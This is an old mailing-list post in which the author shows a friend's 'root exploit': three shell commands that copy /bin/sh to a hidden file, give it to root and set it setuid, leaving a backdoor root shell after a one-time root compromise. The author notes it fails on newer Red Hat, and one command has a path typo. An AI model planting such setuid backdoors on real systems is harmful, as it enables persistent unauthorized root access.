[ale] Please Help

Chris Fowler cfowler at outpostsentinel.com
Thu Mar 28 15:19:18 EST 2002

You bring up a good point.  I was showing a friend a very simple
root exploit.  Heres how it goes:

1) cp /bin/sh ~/.sh
2) chown root ~./sh
3) chmod 4755 ~/.sh

You have to gain root access once to make it work.  Then every time
you log into the machien as a normal user just excute the suid shell.
On old linux distros this trick works.  I can not get it to work on
RH 7.2.  Not sure why.

Chris